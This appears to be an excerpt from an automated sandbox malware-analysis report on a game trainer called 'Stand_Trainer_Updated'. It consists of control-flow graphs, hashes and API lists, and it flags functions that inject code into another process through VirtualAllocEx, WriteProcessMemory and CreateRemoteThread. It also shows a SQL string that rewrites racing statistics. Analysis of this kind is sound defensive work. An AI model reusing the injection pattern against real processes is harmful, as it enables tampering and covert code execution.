                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c03a05bf2d53332616b0a0148c9ef38881067ccab6569503b815eef2efd9f064
                                                                                      • Instruction ID: d8e7e01363701ff53e8ae010a3b7e6730327c8d3e820e7f1b0df25dce10e24ab
                                                                                      • Opcode Fuzzy Hash: c03a05bf2d53332616b0a0148c9ef38881067ccab6569503b815eef2efd9f064
                                                                                      • Instruction Fuzzy Hash: 7C417652B29E4A4BF69DEB3884A55F6A3D1FFA5310F40A47D914FC3293DC28E80A47C4
                                                                                      Function 00007FFAAC6645A1 Relevance: .1, Instructions: 98COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 594 7ffaac6645a1-7ffaac66462f call 7ffb22652010 598 7ffaac664631-7ffaac66463c 594->598 599 7ffaac66463e 598->599 600 7ffaac664644-7ffaac66466f 598->600 599->600
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f5679770645bef816539e2b43060e1df51451643fc9ec1620a3e3230e85e81c9
                                                                                      • Instruction ID: 985cbd1ed0c479f22a8d3bb240fba49209e390e0ce769201085c0165e6681def
                                                                                      • Opcode Fuzzy Hash: f5679770645bef816539e2b43060e1df51451643fc9ec1620a3e3230e85e81c9
                                                                                      • Instruction Fuzzy Hash: 4B21917190CB4C8FDB68DF59D84AAFABBF0EB65321F00816FD04AD3552DA74A809CB51
                                                                                      Function 00007FFAAC6644F5 Relevance: .1, Instructions: 89COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 602 7ffaac6644f5-7ffaac6644fa 603 7ffaac6644fe 602->603 604 7ffaac6644fc-7ffaac6644fd 602->604 605 7ffaac6644ff-7ffaac66450a 603->605 604->603 604->605 606 7ffaac66450e-7ffaac664548 call 7ffaac6643f0 605->606 607 7ffaac66450c-7ffaac66450d 605->607 613 7ffaac66454d-7ffaac66454f 606->613 607->606 614 7ffaac664551-7ffaac664563 613->614 615 7ffaac664566-7ffaac66459c 613->615 614->615
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9eff3f172c1612f9b28d5721565baaf548d9dc074905f6a880347a426f87498a
                                                                                      • Instruction ID: 9b2f738864bf42856c58eedd85e82a8e4f82818b804a280aeb3185eb8375bf42
                                                                                      • Opcode Fuzzy Hash: 9eff3f172c1612f9b28d5721565baaf548d9dc074905f6a880347a426f87498a
                                                                                      • Instruction Fuzzy Hash: CD214F6290EBC68FF75BD7384465160BFA09F5330471965EAC08DCB5A2E904980DC392
                                                                                      Function 00007FFAAC6607C3 Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ff9ca4f5a7f38476e742817cd2b03e3c373df9e088811b19f2e4d86be0fe48ee
                                                                                      • Instruction ID: e4317ad613d332909f0d8f64ffe7af3e5c63a599bedb0baab1a4510b07018cea
                                                                                      • Opcode Fuzzy Hash: ff9ca4f5a7f38476e742817cd2b03e3c373df9e088811b19f2e4d86be0fe48ee
                                                                                      • Instruction Fuzzy Hash: B9217562D5E6868FF75ED778446A095FFA0EF23210708E1BAC44C8B193EE14A80D87D5
                                                                                      Function 00007FFAAC660835 Relevance: .1, Instructions: 58COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 647 7ffaac660835-7ffaac66083a 648 7ffaac66083e 647->648 649 7ffaac66083c-7ffaac66083d 647->649 650 7ffaac66083f-7ffaac6608dd 648->650 649->648 649->650 656 7ffaac6608df-7ffaac6608eb call 7ffaac660560 650->656 658 7ffaac6608f0-7ffaac660902 656->658 660 7ffaac660903 658->660 660->660
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 383fc7e304a473ed2c13e0627f488248b8af33ec5a288753555ed3dadcea8d32
                                                                                      • Instruction ID: 78589358b5dcd86910016faa8714b2eb2e77f451631b935b6b9d5ff80549e76b
                                                                                      • Opcode Fuzzy Hash: 383fc7e304a473ed2c13e0627f488248b8af33ec5a288753555ed3dadcea8d32
                                                                                      • Instruction Fuzzy Hash: 65118F9394E7868FF76BD32858760A9BFE4AF56210709A0FFC48C8B193ED04680D87D5
                                                                                      Function 00007FFAAC660875 Relevance: .0, Instructions: 48COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 661 7ffaac660875-7ffaac66087a 662 7ffaac66087e-7ffaac6608eb call 7ffaac660490 call 7ffaac660560 661->662 663 7ffaac66087c-7ffaac66087d 661->663 675 7ffaac6608f0-7ffaac660902 662->675 663->662 677 7ffaac660903 675->677 677->677
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c66e908460d2b4a2e6bc8c255f7486baebfbbc919ccf8a12cf423ba3166b8c0d
                                                                                      • Instruction ID: d23ba20cbc780dde9dea6ef85bdca7cc64edc5712b06785f0b8e88ae23735a70
                                                                                      • Opcode Fuzzy Hash: c66e908460d2b4a2e6bc8c255f7486baebfbbc919ccf8a12cf423ba3166b8c0d
                                                                                      • Instruction Fuzzy Hash: C7F05B82E4EB8A4AF6AFA27858635FC5F904F56111F0521BBD14D852D7DC48698D03C5
                                                                                      Function 00007FFAAC661239 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 678 7ffaac661239 call 7ffaac660810 680 7ffaac66123e-7ffaac66128a call 7ffaac660820 678->680
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db47fe08fe3ab13a332ff20bffaa10780a8467ebde26691ec73ac3901e686a51
                                                                                      • Instruction ID: c57a064629a5d0dfe7941d37384f961c1cd380da14d6e1149b78c63d132a9819
                                                                                      • Opcode Fuzzy Hash: db47fe08fe3ab13a332ff20bffaa10780a8467ebde26691ec73ac3901e686a51
                                                                                      • Instruction Fuzzy Hash: 19F0A762A18A4A4BF649EB2884526F692E5FF54300F00A179914FC2193DC18E5494284

                                                                                      Non-executed Functions

                                                                                      Function 00007FFB22653180 Relevance: 26.9, APIs: 12, Strings: 3, Instructions: 663injectionmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 687 7ffb22653180-7ffb226531d6 ?_Xlength_error@std@@YAXPEBD@Z 689 7ffb226531dc-7ffb2265320f call 7ffb22654150 687->689 690 7ffb226536aa-7ffb226536d3 call 7ffb22654570 687->690 695 7ffb22653213-7ffb22653216 689->695 696 7ffb22653218-7ffb22653224 695->696 697 7ffb22653226-7ffb22653239 call 7ffb22653f70 695->697 698 7ffb2265323d-7ffb22653247 696->698 697->698 698->695 700 7ffb22653249-7ffb22653265 698->700 702 7ffb2265327d 700->702 703 7ffb22653267-7ffb22653279 call 7ffb22654150 700->703 705 7ffb22653281-7ffb22653284 702->705 703->702 707 7ffb22653294-7ffb226532a7 call 7ffb22653f70 705->707 708 7ffb22653286-7ffb22653292 705->708 709 7ffb226532ab-7ffb226532b5 707->709 708->709 709->705 712 7ffb226532b7-7ffb226532c5 709->712 713 7ffb226532d0-7ffb226532e8 712->713 714 7ffb22653300 713->714 715 7ffb226532ea-7ffb226532fc call 7ffb22654150 713->715 716 7ffb22653304-7ffb22653307 714->716 715->714 719 7ffb22653317-7ffb2265332a call 7ffb22653f70 716->719 720 7ffb22653309-7ffb22653315 716->720 721 7ffb2265332e-7ffb22653338 719->721 720->721 721->716 724 7ffb2265333a-7ffb2265334f 721->724 725 7ffb22653351-7ffb22653363 call 7ffb22654150 724->725 726 7ffb22653367-7ffb2265336b 724->726 725->726 728 7ffb22653370-7ffb22653373 726->728 730 7ffb22653383-7ffb22653396 call 7ffb22653f70 728->730 731 7ffb22653375-7ffb22653381 728->731 733 7ffb2265339a-7ffb226533a4 730->733 731->733 733->728 735 7ffb226533a6-7ffb226533ac 733->735 735->713 736 7ffb226533b2-7ffb226533ce 735->736 737 7ffb226533d0-7ffb226533e2 call 7ffb22654150 736->737 738 7ffb226533e6-7ffb226533ea 736->738 737->738 740 7ffb226533f0-7ffb226533f3 738->740 742 7ffb22653403-7ffb22653416 call 7ffb22653f70 740->742 743 7ffb226533f5-7ffb22653401 740->743 744 7ffb2265341a-7ffb22653424 742->744 743->744 744->740 747 7ffb22653426-7ffb22653438 744->747 748 7ffb22653440-7ffb22653458 747->748 749 7ffb22653470 748->749 750 7ffb2265345a-7ffb2265346c call 7ffb22654150 748->750 752 7ffb22653474-7ffb22653477 749->752 750->749 754 7ffb22653487-7ffb2265349a call 7ffb22653f70 752->754 755 7ffb22653479-7ffb22653485 752->755 756 7ffb2265349e-7ffb226534a8 754->756 755->756 756->752 759 7ffb226534aa-7ffb226534bf 756->759 760 7ffb226534c1-7ffb226534d3 call 7ffb22654150 759->760 761 7ffb226534d7-7ffb226534db 759->761 760->761 762 7ffb226534e0-7ffb226534e3 761->762 764 7ffb226534f3-7ffb22653506 call 7ffb22653f70 762->764 765 7ffb226534e5-7ffb226534f1 762->765 767 7ffb2265350a-7ffb22653514 764->767 765->767 767->762 770 7ffb22653516-7ffb2265351c 767->770 770->748 771 7ffb22653522-7ffb22653538 770->771 772 7ffb22653550 771->772 773 7ffb2265353a-7ffb2265354c call 7ffb22654150 771->773 775 7ffb22653554-7ffb22653557 772->775 773->772 777 7ffb22653567-7ffb2265357a call 7ffb22653f70 775->777 778 7ffb22653559-7ffb22653565 775->778 779 7ffb2265357e-7ffb22653588 777->779 778->779 779->775 782 7ffb2265358a-7ffb22653594 779->782 783 7ffb226535a2-7ffb226535b6 call 7ffb22653f70 782->783 784 7ffb22653596-7ffb226535a0 782->784 785 7ffb226535ba-7ffb226535c8 783->785 784->785 788 7ffb226535ce-7ffb22653648 call 7ffb22654920 VirtualAllocEx WriteProcessMemory 785->788 789 7ffb226536d4-7ffb22653717 call 7ffb22653f50 785->789 795 7ffb2265366f-7ffb22653672 788->795 796 7ffb2265364a-7ffb2265366e VirtualFreeEx call 7ffb22654918 788->796 797 7ffb22653b32-7ffb22653b5a call 7ffb22654570 789->797 798 7ffb2265371d-7ffb22653725 789->798 795->690 800 7ffb22653674-7ffb22653681 795->800 796->795 804 7ffb22653727-7ffb22653772 ReadProcessMemory memcmp 798->804 805 7ffb22653778-7ffb226537ea call 7ffb226531a0 798->805 801 7ffb2265369f-7ffb226536a5 call 7ffb22654918 800->801 802 7ffb22653683-7ffb22653696 800->802 801->690 802->801 807 7ffb22653698-7ffb2265369e _invalid_parameter_noinfo_noreturn 802->807 804->797 804->805 812 7ffb2265381c-7ffb22653833 805->812 813 7ffb226537ec-7ffb226537f9 805->813 807->801 814 7ffb2265383e 812->814 815 7ffb22653835-7ffb2265383c 812->815 816 7ffb226537fb-7ffb2265380e 813->816 817 7ffb22653817 call 7ffb22654918 813->817 821 7ffb22653845-7ffb22653879 call 7ffb22653f70 814->821 815->821 818 7ffb22653ae1-7ffb22653ae7 _invalid_parameter_noinfo_noreturn 816->818 819 7ffb22653814 816->819 817->812 823 7ffb22653ae8-7ffb22653af3 call 7ffb22654918 818->823 819->817 826 7ffb2265387b-7ffb22653885 821->826 827 7ffb22653887-7ffb2265389b call 7ffb22653f70 821->827 831 7ffb22653af4-7ffb22653afc 823->831 830 7ffb2265389f-7ffb226538a9 826->830 827->830 833 7ffb226538ab-7ffb226538b5 830->833 834 7ffb226538b7-7ffb226538cb call 7ffb22653f70 830->834 831->797 835 7ffb22653afe-7ffb22653b0f 831->835 836 7ffb226538cf-7ffb226538d9 833->836 834->836 838 7ffb22653b11-7ffb22653b24 835->838 839 7ffb22653b2d call 7ffb22654918 835->839 842 7ffb226538db-7ffb226538e5 836->842 843 7ffb226538e7-7ffb226538fb call 7ffb22653f70 836->843 838->839 840 7ffb22653b26-7ffb22653b2c _invalid_parameter_noinfo_noreturn 838->840 839->797 840->839 846 7ffb226538ff-7ffb22653918 842->846 843->846 848 7ffb22653930 846->848 849 7ffb2265391a-7ffb2265392c call 7ffb22654150 846->849 850 7ffb22653934-7ffb22653937 848->850 849->848 853 7ffb22653947-7ffb2265395a call 7ffb22653f70 850->853 854 7ffb22653939-7ffb22653945 850->854 855 7ffb2265395e-7ffb22653968 853->855 854->855 855->850 857 7ffb2265396a-7ffb2265398a 855->857 859 7ffb226539a2 857->859 860 7ffb2265398c-7ffb2265399e call 7ffb22654150 857->860 862 7ffb226539a6-7ffb226539a9 859->862 860->859 864 7ffb226539ab-7ffb226539b7 862->864 865 7ffb226539b9-7ffb226539cc call 7ffb22653f70 862->865 867 7ffb226539d0-7ffb226539da 864->867 865->867 867->862 869 7ffb226539dc-7ffb226539ed 867->869 870 7ffb226539ef-7ffb22653a01 call 7ffb22654150 869->870 871 7ffb22653a05-7ffb22653a09 869->871 870->871 872 7ffb22653a10-7ffb22653a13 871->872 875 7ffb22653a23-7ffb22653a36 call 7ffb22653f70 872->875 876 7ffb22653a15-7ffb22653a21 872->876 878 7ffb22653a3a-7ffb22653a44 875->878 876->878 878->872 880 7ffb22653a46-7ffb22653a51 878->880 881 7ffb22653b5b-7ffb22653b6f _CxxThrowException 880->881 882 7ffb22653a57-7ffb22653abb WriteProcessMemory * 2 880->882 882->831 883 7ffb22653abd-7ffb22653aca 882->883 883->823 884 7ffb22653acc-7ffb22653adf 883->884 884->818 884->823
                                                                                      APIs
                                                                                      Strings
                                                                                      • @, xrefs: 00007FFB226535F7
                                                                                      • vector too long, xrefs: 00007FFB22653184
                                                                                      • UPDATE %s SET TopSpeed=%f, DistanceDriven=%u, TimeDriven=%u, TotalWinnings=%u, TotalRepairs=%u, NumPodiums=%u, NumVictories=%u, NumRaces=%u, NumOwners=%u, NumTimesSold=%u, TimeDrivenInRoadTrips=%u, CurOwnerNumRaces=%u, CurOwnerWinnings=%u, NumSkillPointsEarned, xrefs: 00007FFB22653426
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcess$Write_invalid_parameter_noinfo_noreturn$Virtualmemcpy$AllocExceptionFreeReadThrowXlength_error@std@@mallocmemcmp
                                                                                      • String ID: @$UPDATE %s SET TopSpeed=%f, DistanceDriven=%u, TimeDriven=%u, TotalWinnings=%u, TotalRepairs=%u, NumPodiums=%u, NumVictories=%u, NumRaces=%u, NumOwners=%u, NumTimesSold=%u, TimeDrivenInRoadTrips=%u, CurOwnerNumRaces=%u, CurOwnerWinnings=%u, NumSkillPointsEarned$vector too long
                                                                                      • API String ID: 3432736595-2273485850
                                                                                      • Opcode ID: ff04e743a14e27a5f50ae3e48831c4d593fa7fcaafc929ef685421284231d40a
                                                                                      • Instruction ID: b2bf602e454535d3c4ad2bde3d96165393cc0b15933a12835c1153c1dba7ff46
                                                                                      • Opcode Fuzzy Hash: ff04e743a14e27a5f50ae3e48831c4d593fa7fcaafc929ef685421284231d40a
                                                                                      • Instruction Fuzzy Hash: A6524DA3A25A9589FB12CF75DC402EC2770FB18B88F484532EA5DA7B99DF78D561C300
                                                                                      Function 00007FFB22651910 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 277injectionmemorysynchronizationCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 885 7ffb22651910-7ffb22651913 886 7ffb22651cb7 885->886 887 7ffb22651919-7ffb2265197e call 7ffb22654150 885->887 890 7ffb22651982-7ffb22651985 887->890 891 7ffb22651987-7ffb22651993 890->891 892 7ffb22651995-7ffb226519a8 call 7ffb22653f70 890->892 893 7ffb226519ac-7ffb226519b6 891->893 892->893 893->890 896 7ffb226519b8-7ffb226519c2 893->896 897 7ffb226519d0-7ffb226519e4 call 7ffb22653f70 896->897 898 7ffb226519c4-7ffb226519ce 896->898 899 7ffb226519e8-7ffb226519f6 897->899 898->899 901 7ffb226519fc-7ffb22651c53 call 7ffb22654920 VirtualAllocEx WriteProcessMemory call 7ffb22654920 VirtualAllocEx WriteProcessMemory call 7ffb22654920 VirtualAllocEx WriteProcessMemory CreateRemoteThread call 7ffb22654920 WaitForSingleObject call 7ffb22654918 VirtualFreeEx call 7ffb22654918 VirtualFreeEx call 7ffb22654918 VirtualFreeEx call 7ffb22654918 899->901 902 7ffb22651cb8-7ffb22651ccf call 7ffb22653f50 899->902 930 7ffb22651c8b-7ffb22651cb6 call 7ffb22654570 901->930 931 7ffb22651c55-7ffb22651c62 901->931 909 7ffb22651cd1-7ffb22651cdf 902->909 910 7ffb22651d0b-7ffb22651d10 902->910 912 7ffb22651ce1-7ffb22651cf4 909->912 913 7ffb22651cf9-7ffb22651d07 call 7ffb22654918 909->913 914 7ffb22651d11-7ffb22651d27 _invalid_parameter_noinfo_noreturn 912->914 915 7ffb22651cf6 912->915 913->910 914->885 915->913 930->886 932 7ffb22651c80-7ffb22651c86 call 7ffb22654918 931->932 933 7ffb22651c64-7ffb22651c77 931->933 932->930 933->932 935 7ffb22651c79-7ffb22651c7f _invalid_parameter_noinfo_noreturn 933->935 935->932
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$AllocFreeMemoryProcessWrite$_invalid_parameter_noinfo_noreturnmemcpy$CreateObjectRemoteSingleThreadWaitmalloc
                                                                                      • String ID: @
                                                                                      • API String ID: 359211796-2766056989
                                                                                      • Opcode ID: 923724aed1add0c9db85f855cc3076c4de2bc1b638331ad5104b5904c44cb73a
                                                                                      • Instruction ID: 409770c130ee13553cd6b376b842901b220ccd87c303ad2dd2e9351a49c50f80
                                                                                      • Opcode Fuzzy Hash: 923724aed1add0c9db85f855cc3076c4de2bc1b638331ad5104b5904c44cb73a
                                                                                      • Instruction Fuzzy Hash: 97C168B2714B8185EB12CF62EC402AD73A5FB88B88F458136DE9D97B68CF78D565C340
                                                                                      Function 00007FFB22652720 Relevance: 13.9, APIs: 9, Instructions: 427COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1606301450-0
                                                                                      • Opcode ID: 5ae2e6b79edec0f3968cffdec89c313936049c9e9988ad8e25bec2b751d6e6f8
                                                                                      • Instruction ID: d310d2f8c3c000c01156dd1c7d76032f474dea290a28d0779fcc19550706ad3a
                                                                                      • Opcode Fuzzy Hash: 5ae2e6b79edec0f3968cffdec89c313936049c9e9988ad8e25bec2b751d6e6f8
                                                                                      • Instruction Fuzzy Hash: A82248B2B18A829AFB06CF74DC442ED33A1FB4478CF40452AEA5D57B99CEB8D159C340
                                                                                      Function 00007FFB22655024 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 313767242-0
                                                                                      • Opcode ID: 90f41556a7343738b2213ee9ee7f69b153d5a3b61cd0325a1c433d6b6fd49eb8
                                                                                      • Instruction ID: b5b2b015f4f55086f2d91ec9e0c0e0d348cdbdd9b1b3f0baa75edfaffa09ef9f
                                                                                      • Opcode Fuzzy Hash: 90f41556a7343738b2213ee9ee7f69b153d5a3b61cd0325a1c433d6b6fd49eb8
                                                                                      • Instruction Fuzzy Hash: 23313BB3619AC189FB629F70EC443ED6360FB84744F444039DA4E87A94EF78D558C714
                                                                                      Function 00007FFB226531A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 304COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • @, xrefs: 00007FFB226535F7
                                                                                      • UPDATE %s SET TopSpeed=%f, DistanceDriven=%u, TimeDriven=%u, TotalWinnings=%u, TotalRepairs=%u, NumPodiums=%u, NumVictories=%u, NumRaces=%u, NumOwners=%u, NumTimesSold=%u, TimeDrivenInRoadTrips=%u, CurOwnerNumRaces=%u, CurOwnerWinnings=%u, NumSkillPointsEarned, xrefs: 00007FFB22653426
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: @$UPDATE %s SET TopSpeed=%f, DistanceDriven=%u, TimeDriven=%u, TotalWinnings=%u, TotalRepairs=%u, NumPodiums=%u, NumVictories=%u, NumRaces=%u, NumOwners=%u, NumTimesSold=%u, TimeDrivenInRoadTrips=%u, CurOwnerNumRaces=%u, CurOwnerWinnings=%u, NumSkillPointsEarned
                                                                                      • API String ID: 3510742995-1189540536
                                                                                      • Opcode ID: 4d45d62620878725b11631fcb973c50a749d28f5e7bf7a6448b0e22a4ade31d5
                                                                                      • Instruction ID: 794e3c8991c73a811bde3f6f7d983ed3293e0a12e259364c7b5fef88be0184b6
                                                                                      • Opcode Fuzzy Hash: 4d45d62620878725b11631fcb973c50a749d28f5e7bf7a6448b0e22a4ade31d5
                                                                                      • Instruction Fuzzy Hash: 99D16E63B25AE588FB13CB71EC401AC6BB0BB05B98B485131DE5DABB59DF78D562C300
                                                                                      Function 00007FFB226551B0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: e09f90a87769b6277c11b38b7254214313cb37ebbb0d261935752cdcce18699c
                                                                                      • Instruction ID: 21f53d3ab74d9b966e1e9a091180aae6bb1ce0066b2f8b8817c34411eb087da4
                                                                                      • Opcode Fuzzy Hash: e09f90a87769b6277c11b38b7254214313cb37ebbb0d261935752cdcce18699c
                                                                                      • Instruction Fuzzy Hash: A0112E62614F818AEB528F70EC552A933A4FB19758F441A31EA6D87B94DF7CD1A4C340
                                                                                      Function 00007FFB22652230 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 148stringprocessthreadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
